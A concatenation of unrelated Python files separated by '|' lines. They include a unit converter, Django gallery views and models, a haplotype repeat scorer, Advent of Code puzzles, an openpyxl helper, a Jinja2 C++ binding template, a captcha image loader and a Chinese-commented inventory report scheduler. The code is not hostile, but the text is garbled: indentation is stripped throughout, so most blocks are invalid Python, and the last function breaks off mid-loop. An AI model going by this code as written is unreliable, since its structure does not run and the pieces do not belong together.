# importing the sleep function to allow timed breaks before code is displayed
import time
# defining all functions and creating a variable for each one
def Kilograms(kg):
# the return function returns the result. For example, whatever number inputted for 'kg' it is multiplied by 2.2 and returned in a print statement.
return(kg*2.2)
def Pounds(lb):
return(lb/2.2)
def Kilometer(km):
return(km/1.61)
def Mile(m):
return(m*1.61)
def Celcius(c):
return((c*1.8)+32)
def Fahrenheit(f):
return((f-32)/1.8)
# welcomes the user to the program
print("Hello there.\n")
# creating a while loop; the word 'true' means it will loop forever
while True:
# creates a 1 second gap in the code
time.sleep(1)
# creates a variable called choice where the user can choose what they would like to convert
choice=int(input("What would you like to convert?\n1) Kilograms and Pounds\n2) Kilometers and Miles\n3) Celcius and Farenheit\n answer: "))
# creating an if loop in response to what the user inputted for the choice variable
if choice == 1:
# creating a variable called 'convert' asking the user if they want to convert from one to another
convert=int(input("Please pick an option\n1) Kilograms to Pounds\n2) Pounds to Kilograms\n choice: "))
# creating an if loop inside an if loop for the user's response to the 'convert' variable
if convert == 1:
# using the defined function and variable 'Kilograms' and using float to allow the user to input a decimal if necessary
kg=Kilograms(float(input("\nEnter how many kilograms you would like to convert: ")))
# creating a half a second gap in the program before the next bit is displayed
time.sleep(0.5)
# creates a gap in the program
print("\n")
# displays the return value of the function with the user's input and rounded to 2 decimal places
print("The amount you entered in kilograms is",round(kg,2), "pounds.\n")
# another if loop for the other option of the 'convert' variable
if convert == 2:
# using the defined function and variable 'Pounds' and using float to allow the user to input a decimal if necessary
lb=Pounds(float(input("Enter how many pounds you would like to convert: ")))
# creates a half a second gap in the code before the next bit is displayed
time.sleep(0.5)
# creates a gap in the code
print("\n")
# displays the return value of the function with the user's input and rounded to 2 decimal places
print("The amount you entered in pounds is",round(lb,2), "kilograms.\n")
# creating an else/if statement in response to the choice variable
elif choice == 2:
# creating a variable called 'convert2' to allow the user to chosse what they would like to convert from
convert2=int(input("\nPlease pick an option\n1) Kilometers to Miles\n2) Miles to Kilometers\n choice: "))
# creating an if loop within an if loop for the user's response to the 'convert2' variable
if convert2 == 1:
# using the defined function and variable 'Kilometers' and using float to allow the user to input a decimal if necessary
km=Kilometer(float(input("\nEnter how many kilometers you would like to convert: ")))
# creates a half a second gap in the program before displaying the next bit
time.sleep(0.5)
# creates a gap
print("\n")
# displays the return value of the function with the user's input and rounded to 2 decimal places
print("The amount you entered in kilometers is",round(km,2), "miles.\n")
# an if loop for the other option of the 'convert2' variable
if convert2 == 2:
# using the defined function and variable 'Mile' and using float to allow the user to input a decimal if necessary
m=Mile(float(input("\nEnter how many miles you would like to convert: ")))
# creates a a half a second break in the program before displaying the rest
time.sleep(0.5)
# creates a gap in the program
print("\n")
# displays the return value of the function with the user's input and rounded to 2 decimal places
print("The amount you entered in miles is",round(m,2), "kilometers.")
# ending the the 'choice' if loop
else:
# creating a variable called 'convert3' to allow the user to choose what they would like to convert from
convert3 = int(input("\nPlease pick an option\n1) Celcius to Fahrenheit\n2) Fahrenheit to Celcius\n choice: "))
# creating an if loop within an if loop for the 'convert3' variable
if convert3 == 1:
# using the defined variable and function 'Celcius' and using float to allow the user to enter a decimal if necessary
c=Celcius(float(input("\nEnter how many degrees celcius would you like to convert: ")))
# creates a half a second break in the program before displaying the rest
time.sleep(0.5)
# creates a gap in the program
print("\n")
# displays the return value of the function with the user's input and rounded to 2 decimal places
print("The amount you entered in celcius is",round(c,2), "fahrenheit.")
# an if loop for the other option of the 'convert3' variable
if convert3 == 2:
# using the defined function and variable 'Fahrenheit' and using float to allow the user to enter a decimal if necessary
f=Fahrenheit(float(input("\nEnter how many degrees fahrenheit would you like to convert: ")))
# creates a half a second break in the program before displaying the rest
time.sleep(0.5)
# creates a gap in the program
print("\n")
# displays the return value of the function with the user's input and rounded to 2 decimal places
print("The amount you entered in fahrenheit is",round(f,2), "celcius.")
|
from django.shortcuts import render_to_response
from django.template import RequestContext
from django.http import HttpResponse
import json
from models import PhotoGallery, VideoGallery, VideoFile
from seafoodservice import settings
from information.views import set_required_data
def gallery(request):
photos = PhotoGallery.objects.filter(add_this_photo_to_gallery=True)
videos = []
for i in VideoGallery.objects.all():
i_to_dict = i.to_dict()
x = VideoFile.objects.filter(video=i).values()
i_to_dict.update({'videos': x})
videos += [i_to_dict]
context = {
"photos": zip(range(1, len(photos)+1), photos),
"videos": videos
}
print context
context.update(set_required_data(request))
return render_to_response('gallery.html',
context,
context_instance=RequestContext(request))
def get_slide_images(request):
context = {
"slides": [settings.MEDIA_URL+i.photo.name for i in PhotoGallery.objects.filter(add_this_photo_to_slide=True)],
}
return render_to_response('slider_view.html',
context,
context_instance=RequestContext(request))
|
#!/bin/env python
import sys
tandem_repeatfn = sys.argv[1]
hap1_fn = sys.argv[2]
hap2_fn = sys.argv[3]
output = {}
def score_alignment(ref,query):
score = 0.0
alignment = 0.0
for r,q in zip(ref,query):
if r.upper() == q.upper():
score += 1.0
alignment += 1.0
score = score/alignment
return score
def add_haplotype_info(hap_fn):
with open(hap_fn, 'r') as hap_fh:
for index,line in enumerate(hap_fh):
line = line.rstrip().split('\t')
id_1 = line[1]
id_2 = line[2]
motif_seq = line[3]
number_of_motifs = line[4]
perfect_motif_locus = line[5]
query_motif_locus = line[6]
ref_left_flank = line[7]
query_left_flank = line[8]
ref_right_flank = line[7]
query_right_flank = line[8]
assert id_1 == id_2
motif_score = score_alignment(perfect_motif_locus,query_motif_locus)
left_flank_score = score_alignment(ref_left_flank,query_left_flank)
right_flank_score = score_alignment(ref_right_flank,query_right_flank)
items_to_add = [number_of_motifs,motif_score,left_flank_score,right_flank_score,
perfect_motif_locus,query_motif_locus,
ref_left_flank,query_left_flank,
ref_right_flank,query_right_flank]
motif_info = id_1.split("_")
chrom = motif_info[0]
start = motif_info[1]
end = motif_info[2]
motif_size = motif_info[3]
number_of_motifs = motif_info[4]
for item in items_to_add:
output[(chrom,start,end,motif_size,number_of_motifs)].append(item)
with open(tandem_repeatfn,'r') as tandem_repeatfh:
for line in tandem_repeatfh:
line = line.rstrip().split('\t')
chrom = line[0]
start = line[1]
end = line[2]
motif_size = line[3]
number_of_motifs = line[4]
motif_seq = line[6]
output[(chrom,start,end,motif_size,number_of_motifs)] = [chrom,start,end,motif_size,number_of_motifs,motif_seq]
add_haplotype_info(hap1_fn)
add_haplotype_info(hap2_fn)
header = ["chrom","start","end","motif_size","number_of_motifs","motif_seq",
"hap_1_number_of_motifs","hap_1_motif_score","hap_1_left_flank_score","hap_1_right_flank_score",
"hap_1_perfect_motif_locus","hap_1_query_motif_locus",
"hap_1_ref_left_flank","hap_1_query_left_flank",
"hap_1_ref_right_flank","hap_1_query_right_flank",
"hap_2_number_of_motifs","hap_2_motif_score","hap_2_left_flank_score","hap_2_right_flank_score",
"hap_2_perfect_motif_locus","hap_2_query_motif_locus",
"hap_2_ref_left_flank","hap_2_query_left_flank",
"hap_2_ref_right_flank","hap_2_query_right_flank"]
print "\t".join(header)
for index in output:
if len(header) != len(output[index]):
continue
out_line = output[index]
print "\t".join(map(str,out_line))
|
import subprocess
import re
import platform
#returns ip as string value
def return_ip():
if platform.system() == "Windows":
p=subprocess.check_output("ipconfig")
ip = re.search(' IPv4 Address. . . . . . . . . . . : (.+?)\n Subnet', p)
return ip.group(1).strip()
else:
p=subprocess.check_output("ifconfig")
ip = re.search('inet addr:(.+?) Bcast', p)
return ip.group(1)
|
from flask import Flask
def create_app():
app = Flask(__name__)
from app.views import get_view, post_view
get_view.init_app(app)
post_view.init_app(app)
return app
|
from django.db import models
from users.models import MyUser
from posts.models import AnswerPost, WalkthroughPost, QuestionPost, WalkthroughComment
# Create your models here.
class Notification(models.Model):
mentioned = models.ForeignKey(MyUser, on_delete=models.CASCADE, related_name='mentioned')
walkthrough_post = models.ForeignKey(WalkthroughPost, on_delete=models.CASCADE, related_name='walkthrough_post', blank=True, null=True)
question_post = models.ForeignKey(QuestionPost, on_delete=models.CASCADE, related_name='question_post', blank=True, null=True)
comment_post = models.ForeignKey(WalkthroughComment, on_delete=models.CASCADE, related_name='comment_post', blank=True, null=True)
answer_post = models.ForeignKey(AnswerPost, on_delete=models.CASCADE, related_name='answer_post', blank=True, null=True )
seen = models.BooleanField(default=False)
def __str__(self):
return self.mentioned.username |
from functools import reduce
from collections import Counter
if __name__ == '__main__':
# Get the input data
with open('inputs/day_06.txt') as f:
file_data = f.readlines()
# Part 1
tracker_list = []
group_set = set()
counter = []
for i, line in enumerate(file_data):
chars = line.replace('\n', '')
if chars == '':
tracker_list.append(group_set)
counter.append(len(group_set))
group_set = set()
else:
for char in chars:
group_set.add(char)
if i + 1 == len(file_data):
tracker_list.append(group_set)
counter.append(len(group_set))
print(f"Answer to part 1: {reduce(lambda x, y: x+y, counter)}")
# Part 2
num_in_group = 0
group_string = ''
tracker_list = []
for i, line in enumerate(file_data):
chars = line.replace('\n', '')
if chars == '':
tracker_list.append({'num_in_group': num_in_group, 'group_count': Counter(group_string)})
group_string = ''
num_in_group = 0
else:
num_in_group += 1
for char in chars:
group_string = group_string + char
if i + 1 == len(file_data):
tracker_list.append({'num_in_group': num_in_group, 'group_count': Counter(group_string)})
count_list = []
for detail_dict in tracker_list:
num_in_group = detail_dict['num_in_group']
group_count = detail_dict['group_count']
number_answer_the_same = [x for x in group_count if group_count[x] == num_in_group]
count_list.append(len(number_answer_the_same))
print(f"Answer to part 2: {reduce(lambda x, y: x+y, count_list)}")
|
import os, operator, sys, argparse
def formatFileSize(num):
for label in ['bytes', 'KB', 'MB', 'GB', 'TB']:
if num < 1024.0:
return "%3.1f %s" % (num, label)
num /= 1024.0
def listFilesSize(args):
if args.dir:
folderPath = args.dir
if os.path.exists(folderPath):
filesWithSize = getSortedFilesListWithSize(folderPath)
for fi in filesWithSize:
print(fi[0], formatFileSize(fi[1]))
else:
print("The supplied directory does not exist")
else:
print("Please supply target directory using --dir")
def getSortedFilesListWithSize(folderPath):
filesList = (os.path.join(basedir, filename) for basedir, dirs, files in os.walk(folderPath) for filename in files)
filesWithSize = ((path, os.path.getsize(path)) for path in filesList)
filesWithSize = sorted(filesWithSize, key = operator.itemgetter(1), reverse=True)
return filesWithSize
def parseArguments():
parser = argparse.ArgumentParser(description='Files Size List')
parser.add_argument('-V', '--version', action='version', version='0.0.1')
parser.add_argument("-d", "--dir", help="Supplied directory to analyze", type=str, required = True)
return parser.parse_args()
if __name__ == '__main__':
args = parseArguments()
listFilesSize(args) |
import sys
sys.path.append('./')
from utils.filename import calculateFileName
filename = calculateFileName(sys.argv)
f = open(filename, "r")
input = f.read()
lines = input.split('\n') # even though the input will have only 1 line, it is used for testing
def skipTrash(line, index, skippedTrash):
while index < len(line):
if line[index] == '>':
return (index, skippedTrash)
elif line[index] == '!':
index += 1
else:
skippedTrash += 1
index += 1
def checkInnerGroup(line, index, depth, score, skippedTrash):
while index < len(line):
if line[index] == '{':
(index, score, skippedTrash) = checkInnerGroup(line, index+1, depth + 1, score, skippedTrash)
elif line[index] == '<':
(index, skippedTrash) = skipTrash(line, index + 1, skippedTrash)
elif line[index] == '!':
index +=1
elif line[index] == '}':
score += depth
return(index, score, skippedTrash)
index += 1
return (index, score, skippedTrash)
for line in lines:
index = 0
if line[index] =='{':
(index, score, skippedTrash) = checkInnerGroup(line, index+1, 1, 0, 0)
print(score, skippedTrash)
|
from django.db import models
from pubg_python import Shard
# Create your models here.
class Item(models.Model):
name = models.CharField(max_length=200)
image = models.ImageField()
def __str__(self):
return self.name
class Player(models.Model):
player_id = models.CharField(max_length=200, primary_key=True)
player_name = models.CharField(max_length=200)
shard = models.CharField(max_length=200, null=True)
count = models.IntegerField()
def get_shard(self):
for s in Shard:
if s.value == self.shard:
return s
return -1
def __str__(self):
return self.player_name
class PlayerItem(models.Model):
player_id = models.ForeignKey(Player, on_delete=models.CASCADE)
item_id = models.ForeignKey(Item, on_delete=models.CASCADE)
def __str__(self):
return self.item_id
class MatchChecked(models.Model):
player_id = models.ForeignKey(Player, on_delete=models.CASCADE)
match_id = models.CharField(max_length=200)
def __str__(self):
return self.match_id
|
'''
@author: Vrushabh_Hukkerikar
'''
from openpyxl import load_workbook
from openpyxl.styles import PatternFill,colors,Font,NamedStyle
class ReadExcel(object):
'''
classdocs
'''
sheetname=""
def GetCellData(self,ExcelFileLocation,Sheetname,column,row):
wb = load_workbook(ExcelFileLocation,data_only=True)
ReadExcel.sheetname = wb[Sheetname]
CellLocation = column + row
# print("reading")
#print(ReadExcel.sheetname[CellLocation].value)
return (ReadExcel.sheetname[CellLocation].value)
def GetRowCount(self,ExcelFileLocation,SN1):
#print(SN1)
Sheetname1 = SN1
wb = load_workbook(ExcelFileLocation)
SN = wb[Sheetname1]
row_count = SN.max_row
return row_count
def WriteExcel(self,ExcelFileLocation,Sheetname,colno,rowno,storingvalue):
wb = load_workbook(ExcelFileLocation,data_only=True)
ReadExcel.sheetname = wb[Sheetname]
#CellLocation = column + row
sheetname=wb.active
NewCell=sheetname.cell(row=colno, column=rowno)
NewCell.value=storingvalue
wb.save(ExcelFileLocation)
return (NewCell.value)
def GreenBgrColor(self,ExcelFileLocation,Sheetname,colno,rowno):
wb = load_workbook(ExcelFileLocation,data_only=True)
ReadExcel.sheetname = wb[Sheetname]
sheetname=wb.active
NewCell=sheetname.cell(row=colno, column=rowno)
NewCell.fill = PatternFill(fgColor=colors.GREEN, fill_type="solid")
wb.save(ExcelFileLocation)
return (NewCell.fill)
def RedBgrColor(self,ExcelFileLocation,Sheetname,colno,rowno):
wb = load_workbook(ExcelFileLocation,data_only=True)
ReadExcel.sheetname = wb[Sheetname]
sheetname=wb.active
NewCell=sheetname.cell(row=colno, column=rowno)
NewCell.fill = PatternFill(fgColor=colors.RED, fill_type="solid")
wb.save(ExcelFileLocation)
return (NewCell.fill)
def __init__(self):
'''
Constructor
'''
|
from jinja2 import Template
SSI_UPPER_TEMPLATE = Template("""
#include <string>
#include <mil/darpa/sosite/stitches/stitcheslib>
#include <pybind11/pybind11.h>
#include <pybind11/embed.h>
#include "spdlog/spdlog.h"
#include <{{ ss_mod }}/{{ ss_name }}/SSI/SSIMid.hpp>
#include <{{ ss_mod }}/{{ ss_name }}/SSI/SSIUpper.hpp>
// TODO: Include files for each interface
{% for in_int in in_ints %}
{% set i_name=in_int.name %}
#include <{{ ss_mod }}/{{ ss_name }}/SSI/{{ i_name }}/{{ i_name }}CallbackInterface.hpp>
{% endfor %}
namespace py = pybind11;
using namespace py::literals;
namespace {{ ss_mod }} {
namespace {{ ss_name }} {
namespace SSI {
{% for f in ss_fields %}
inline std::shared_ptr<{{ f._RESOURCE_MODULE}}::ftg::{{ f._RESOURCE_NAME }}> {{ f._RESOURCE_NAME }}FromPy(py::object pyObj) {
std::shared_ptr<{{ f._RESOURCE_MODULE}}::ftg::{{ f._RESOURCE_NAME }}> outMsg = std::make_shared<{{ f._RESOURCE_MODULE}}::ftg::{{ f._RESOURCE_NAME }}>();
{%- for sf in f._SUB_FIELDS %}
outMsg->m{{ to_camel(sf.name) }} = pyObj.attr("{{ sf.name }}").cast<{{ type_to_c(sf.field_type.type) }}>();
{% endfor -%}
return outMsg;
};
{% endfor %}
{% for f in ss_fields %}
inline py::object {{ f._RESOURCE_NAME }}ToPy(std::shared_ptr<{{ f._RESOURCE_MODULE}}::ftg::{{ f._RESOURCE_NAME }}> sMsg) {
spdlog::debug("Loading Field module {{ f._RESOURCE_NAME }}");
py::object pyField;
auto gil_state = PyGILState_Ensure();
{
py::module fieldMod = py::module::import("{{ f._RESOURCE_NAME }}");
spdlog::debug("Loading Field class {{ f._RESOURCE_NAME }}");
py::object fieldCls = fieldMod.attr("{{ f._RESOURCE_NAME }}");
pyField = fieldCls();
{%- for sf in f._SUB_FIELDS %}
pyField.attr("{{ sf.name }}") = py::cast(sMsg->m{{ to_camel(sf.name) }});
{% endfor -%}
}
PyGILState_Release(gil_state);
return pyField;
};
{% endfor %}
class {{ ss_name }}SSIUpper : public SSIUpper {
public:
{{ ss_name }}SSIUpper(py::object pySS)
: SSIUpper() {
wrappedCls = pySS;
// this->wrappedCls.attr("init")();
wrappedCls.attr("_int_cb") = py::cpp_function(
[&](std::string intName, py::object intOut) {
{% for out_int in out_ints %}
if (intName == "{{out_int.name}}") {
std::shared_ptr<{{ field_to_c(out_int.type) }}> msgPtr = {{ out_int.type._RESOURCE_NAME}}FromPy(intOut);
//spdlog::debug("{}", *msgPtr);
send_{{ out_int.name }}(msgPtr);
}
{% endfor %}
}
);
}
~{{ ss_name }}SSIUpper() {
}
void run() {
this->wrappedCls.attr("run")();
}
protected:
py::object wrappedCls;
void bindToCore() {
}
{% for in_int in in_ints %}
{% set i_name=in_int.name %}
{% set i_type=in_int.type %}
class {{ i_name }}CallbackInterfaceImpl : public {{ i_name }}::{{ i_name }}CallbackInterface {
public:
{{ i_name }}CallbackInterfaceImpl (py::function cbFunc) {
spdlog::debug("Binding Python callback {}", (void*)&cbFunc);
this->cbFunc = cbFunc;
}
// Method invoked by SSI Mid upon receipt of STITCHES message
bool process( mil::darpa::sosite::stitches::StitchesPtr< {{ i_type._RESOURCE_MODULE }}::{{ i_type._RESOURCE_GROUP }}::{{ i_type._RESOURCE_NAME }} > stitches_msg ) {
spdlog::debug("Converting message to Python");
auto gil_state = PyGILState_Ensure();
{
convertedObj = {{ i_type._RESOURCE_NAME }}ToPy(stitches_msg);
spdlog::debug("Invoking callback with py object object");
this->cbFunc(convertedObj);
}
PyGILState_Release(gil_state);
return true;
}
protected:
py::function cbFunc;
py::object convertedObj;
};
{{ i_name }}CallbackInterfaceImpl* {{ i_name }}Cb;
{{ i_name }}::{{ i_name }}CallbackInterface* instantiate{{ i_name }}CallbackInterface() {
spdlog::info("Instantiating callback for interface {{ i_name }}");
py::function cbFunc = (py::function)this->wrappedCls.attr("{{ in_int.method.__name__ }}");
{{ i_name }}Cb = new {{ i_name }}CallbackInterfaceImpl(cbFunc);
spdlog::info("Done instantiating callback for interface {{ i_name }} {}", (void*){{ i_name }}Cb);
return ({{ ss_mod }}::{{ ss_name }}::SSI::{{ i_name }}::{{ i_name }}CallbackInterface*) {{ i_name }}Cb;
};
{% endfor %}
};
}
}
}
""") |
import requests
import cv2
import numpy as np
# Download captcha images from link and save
def get_image_link(link):
"""Download image from given url.
:param link: given url where image is located
:return: image downloaded from url
"""
req = requests.get(link)
try:
req.raise_for_status()
except Exception as exc:
print('There was a problem: %s' % exc)
loaded_image = req.content
loaded_image = cv2.imdecode(np.asarray(bytearray(loaded_image)), 1)
loaded_image = cv2.cvtColor(loaded_image, cv2.COLOR_BGR2GRAY)
return loaded_image
# Get image from external file(path)
def get_image_path(path):
"""Load image from local directory.
:param path: given path where image is stored
:return: image loaded from directory
"""
loaded_image = cv2.imread(path)
loaded_image = cv2.cvtColor(loaded_image, cv2.COLOR_BGR2GRAY)
label = ((path.split('/')[-1]).split('\\')[-1]).split('.')[0]
return loaded_image, label
# Determine if input is link or path & return image
def get_image(which):
"""Decide if parameter is a link or directory, and load image from it.
:param which: link or directory to where image is located
:return: image pulled from link or directory
"""
try:
image = get_image_link(which)
return image
except:
try:
image, label = get_image_path(which)
return image
except:
print('Load error. Try again')
|
import numpy as np
np.random.seed(0)
X =[[1, 2, 3, 2.5], #need to normalize and scale this dataset to this range[-1,1]
[2.0, 5.0, -1.0,2.0],
[-1.5, 2.7, 3.3, -0.8]]
bais =[]
class Layer_Dense:
def __init__(self, n_inputs, n_neurons): #n_inputs = how many features in a sample
self.weights = 0.10*np.random.randn(n_inputs, n_neurons) #weight matrix
self.biases = np.zeros((1, n_neurons)) #initially set bias to zero unless in special cases where output is zero put small value
def forward(self, inputs):
self.output = np.dot(inputs, self.weights) + self.biases
# create instance of object
Layer1 = Layer_Dense(4,5)
Layer2 = Layer_Dense(5,2) #input must be output of Layer1
#output
Layer1.forward(X)
Layer2.forward(Layer1.output)
# print(Layer1.output)
print(Layer2.output)
# print( 0.10*np.random.randn(4, 3)) # randn method = same like guisian ..gives numbers around 1
# # 4, 3 determines the shape of the weight batch (Matrix)
# # multiply by 0.10 (normalized or scale) to smaller values |
#!C:\Python27
def loop_test():
for each in range(1, 12345):
print each
loop_test()
# if __name__ == '__main__':
# loop_test()
|
#ex6_3: dictionary
dictionary = {'items':"the content of a dictionary",
'key':'the handle of data',
'value':'the data that saved in items'}
for i in dictionary.keys():
print('\nThe meaning of '+str(i)+' is:')
print(dictionary[i])
|
# 165.比较版本号
class Solution:
def compareVersion(self, version1: str, version2: str) -> int:
list1, list2 = version1.split('.'), version2.split('.')
# 去除前缀0
list1, list2 = list(map(int, list1)), list(map(int, list2))
# 去除后置0
while list1 and list1[-1] == 0:
list1.pop()
while list2 and list2[-1] == 0:
list2.pop()
# print('list1:', list1)
# print('list2:', list2)
len1, len2 = len(list1), len(list2)
i = 0
# 逐个比较
while i < len1 and i < len2:
if list1[i] > list2[i]:
return 1
elif list1[i] < list2[i]:
return -1
i += 1
# 如果前部分都相同 则看长度
if len1 > len2:
return 1
elif len1 < len2:
return -1
else:
return 0
if __name__ == '__main__':
obj = Solution()
print(obj.compareVersion('1', '0'))
# print(obj.compareVersion('1.0.0', '1.0'))
# print(obj.compareVersion('1.01', '1.001'))
# print(obj.compareVersion('0.1', '1.1'))
# print(obj.compareVersion('1.0.1', '1'))
# print(obj.compareVersion('7.5.2.4', '7.5.3')) |
import uuid
import xlwt
import time, datetime
from app.models import db, Order, Store, Affair
from utils.comment import scheduler
def Create_id():
u_id = str(uuid.uuid1())
id = u_id.replace('-', '')
return id
def get_page(request, database, id):
# 查询第几页的数据
page = int(request.args.get('page', 1))
# 谷歌每页的条数是多少,默认为9条
# page_num = int(request.args.get('page_num', 9))
# IE每页的条数是多少,默认为7条
page_num = int(request.args.get('page_num', 7))
# 查询当前第几个的多少条数据
paginate = database.query.order_by(id).paginate(page, page_num)
# 获取某也的具体数据
database = paginate.items
return database, paginate
# 定时生成订货报表
def generate_order():
# 生成workbook
workbook = xlwt.Workbook(encoding='utf-8')
# 生成worksheet
worksheet = workbook.add_sheet('订货报表')
# 添加数据的列说明
# 写入数据序号、零件ID、零件名称、主要供应商信息、次要供应商信息、采购数量
order_data_head = ['序号', '订货编号', '零件编号', '零件名称', '供应商编号(主)',
'名称', '联系人名称', '联系方式', '地址', '供应商编号(次)',
'名称', '联系人名称', '联系方式', '地址', '零件单价(元)',
'采购数量(件)', '采购总金额(元)']
# 写入标题'零件订货报表'
# 设置样式
head_style = xlwt.XFStyle()
# 添加字体
head_font = xlwt.Font()
head_font.name = '宋体'
# 20为衡量单位,16位字号
head_font.height = 20 * 18
head_style.font = head_font
# 设置对齐方式
head_alignment = xlwt.Alignment()
head_alignment.horz = xlwt.Alignment.HORZ_CENTER
head_alignment.vert = xlwt.Alignment.VERT_CENTER
head_style.alignment = head_alignment
# 设置边框
head_borders = xlwt.Borders()
head_borders.left, head_borders.right, head_borders.top, head_borders.bottom = xlwt.Borders.THIN, xlwt.Borders.THIN, xlwt.Borders.THIN, xlwt.Borders.THIN
head_style.borders = head_borders
# 写入'零件订货报表'
worksheet.write_merge(0, 3, 0, len(order_data_head) - 1, '零件订货报表', head_style)
# 写入生成时间
# 设置样式
time_style = xlwt.XFStyle()
# 添加字体
time_font = xlwt.Font()
time_font.name = '宋体'
# 20为衡量单位,16位字号
time_font.height = 20 * 12
time_style.font = time_font
# 设置对齐方式
time_alignment = xlwt.Alignment()
time_alignment.horz = xlwt.Alignment.HORZ_LEFT
time_alignment.vert = xlwt.Alignment.VERT_CENTER
time_style.alignment = time_alignment
# 设置边框
time_borders = xlwt.Borders()
time_borders.left, time_borders.right, time_borders.top, time_borders.bottom = xlwt.Borders.THIN, xlwt.Borders.THIN, xlwt.Borders.THIN, xlwt.Borders.THIN
time_style.borders = time_borders
# 写入时间
strtime_ = time.strftime("%Y-%m-%d")
time_ = '报表生成时间:' + strtime_
worksheet.write_merge(4, 4, 0, len(order_data_head) - 1, time_, time_style)
# 初始化数据的样式
data_head_style = xlwt.XFStyle()
# 添加字体
data_head_font = xlwt.Font()
data_head_font.name = '宋体'
# 20为衡量单位,12位字号
data_head_font.height = 20 * 10
data_head_style.font = data_head_font
# 设置对齐方式
data_head_alignment = xlwt.Alignment()
data_head_alignment.horz = xlwt.Alignment.HORZ_CENTER
data_head_alignment.vert = xlwt.Alignment.VERT_CENTER
data_head_style.alignment = data_head_alignment
# 设置边框
data_head_borders = xlwt.Borders()
data_head_borders.left, data_head_borders.right, data_head_borders.top, data_head_borders.bottom = xlwt.Borders.THIN, xlwt.Borders.THIN, xlwt.Borders.THIN, xlwt.Borders.THIN
data_head_style.borders = data_head_borders
# 循环写入
for idx, i in enumerate(order_data_head):
# 设置单元格宽度
worksheet.col(idx).width = 3333
worksheet.write(5, idx, i, data_head_style)
worksheet.col(0).width = 1111
# 写入数据
# 设置字体
data_style = xlwt.XFStyle()
data_font = xlwt.Font()
data_font.name = '宋体'
# 20为衡量单位,12位字号
data_font.height = 20 * 10
data_style.font = data_font
# 设置对齐方式
data_alignment = xlwt.Alignment()
data_alignment.horz = xlwt.Alignment.HORZ_LEFT
data_alignment.vert = xlwt.Alignment.VERT_CENTER
data_style.alignment = data_alignment
# 设置边框
data_borders = xlwt.Borders()
data_borders.left, data_borders.right, data_borders.top, data_borders.bottom = xlwt.Borders.THIN, xlwt.Borders.THIN, xlwt.Borders.THIN, xlwt.Borders.THIN
data_style.borders = data_borders
# 循环写入数据
with scheduler.app.app_context():
orders = db.session.query(Order).filter_by(order_status=0).order_by('order_id').all()
for order_idx, i in enumerate(orders):
if i.o_part != None and i.o_part.p_supplier != None:
worksheet.write(6 + order_idx, 0, order_idx + 1, data_style)
order_id_ = str(i.order_id)
order_id = order_id_.zfill(8)
worksheet.write(6 + order_idx, 1, order_id, data_style)
part_id_ = str(i.part_id)
part_id = part_id_.zfill(8)
worksheet.write(6 + order_idx, 2, part_id, data_style)
worksheet.write(6 + order_idx, 3, i.o_part.part_name, data_style)
p_supper_id_ = str(i.o_part.p_supplier_id)
p_supper_id = p_supper_id_.zfill(8)
worksheet.write(6 + order_idx, 4, p_supper_id, data_style)
worksheet.write(6 + order_idx, 5, i.o_part.p_supplier.supplier_contact_name, data_style)
worksheet.write(6 + order_idx, 6, i.o_part.p_supplier.supplier_name, data_style)
worksheet.write(6 + order_idx, 7, i.o_part.p_supplier.supplier_contact, data_style)
worksheet.write(6 + order_idx, 8, i.o_part.p_supplier.supplier_address, data_style)
if i.o_part.s_supplier != None:
s_supper_id_ = str(i.o_part.s_supplier_id)
s_supper_id = s_supper_id_.zfill(8)
worksheet.write(6 + order_idx, 9, s_supper_id, data_style)
worksheet.write(6 + order_idx, 10, i.o_part.s_supplier.supplier_contact_name, data_style)
worksheet.write(6 + order_idx, 11, i.o_part.s_supplier.supplier_name, data_style)
worksheet.write(6 + order_idx, 12, i.o_part.s_supplier.supplier_contact, data_style)
worksheet.write(6 + order_idx, 13, i.o_part.s_supplier.supplier_address, data_style)
else:
worksheet.write(6 + order_idx, 9, '/', data_style)
worksheet.write(6 + order_idx, 10, '/', data_style)
worksheet.write(6 + order_idx, 11, '/', data_style)
worksheet.write(6 + order_idx, 12, '/', data_style)
worksheet.write(6 + order_idx, 13, '/', data_style)
worksheet.write(6 + order_idx, 14, i.o_part.part_price, data_style)
worksheet.write(6 + order_idx, 15, i.order_num, data_style)
worksheet.write(6 + order_idx, 16, (i.order_num * i.o_part.part_price), data_style)
# 修改订货信息状态
i.order_status = 1
db.session.commit()
# 写入采购人签名
# 保存表格
xls_dir = 'static/order_folder/订货报表' + strtime_ + '.xls'
workbook.save(xls_dir)
print('订货报表已经生成')
def update_store():
# 每一个小时根据事务更新一次库存清单,暂定从早上7点到下午4点
# 如果库存小于库存临界值,则更新订货报表
with scheduler.app.app_context():
# 处理事务
# 获取按照时间排序未处理的事务
affairs = db.session.query(Affair).filter_by(affair_status=0).order_by('affair_commit_time').all()
for affair in affairs:
store = db.session.query(Store).filter_by(part_id=affair.part_id).first()
if store != None:
# 如果是出库,且可以出库
if affair.affair_type == 0 and affair.affair_num <= store.store_num:
store.store_num = store.store_num - affair.affair_num
# 修改事务信息
affair.affair_status = 1
time_str = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))
curr_time = datetime.datetime.strptime(time_str, '%Y-%m-%d %H:%M:%S')
affair.affair_finish_time = curr_time
db.session.commit()
# 如果是入库,且可以入库
elif affair.affair_type == 1 and affair.affair_num + store.store_num <= store.store_max:
# 修改事务信息
store.store_num = store.store_num + affair.affair_num
affair.affair_status = 1
time_str = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))
curr_time = datetime.datetime.strptime(time_str, '%Y-%m-%d %H:%M:%S')
affair.affair_finish_time = curr_time
if affair.order_id != None:
# 如果有订单信息,则同时更新订单信息
order = Order.query.filter_by(order_id=affair.order_id).first()
order.purchased_num = min((order.purchased_num + affair.affair_num), order.order_num)
# o_time_str = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))
# o_curr_time = datetime.datetime.strptime(o_time_str, '%Y-%m-%d %H:%M:%S')
order.order_time = curr_time
db.session.commit()
# 其他情况
else:
pass
else:
pass
stores_list = db.session.query(Store).order_by('store_id').all()
for i in stores_list:
# 如果库存清单的值小于临界值
if i.store_num < i.store_cv:
# 产生订货信息,如果订货信息已经存在,则更新订货数量
# 已经产生了订货报表的,且已经购买的数量小于订货数量的
order_writed = db.session.query(Order).filter(Order.part_id == i.part_id, Order.order_status == 1,
Order.purchased_num < Order.order_num).all()
# 计算新的订单需要购买的数量
pre_order_num = 0
pre_purchased_num = 0
# need_order_num = 0
for j in order_writed:
pre_order_num = pre_order_num + j.order_num
pre_purchased_num = pre_purchased_num + j.purchased_num
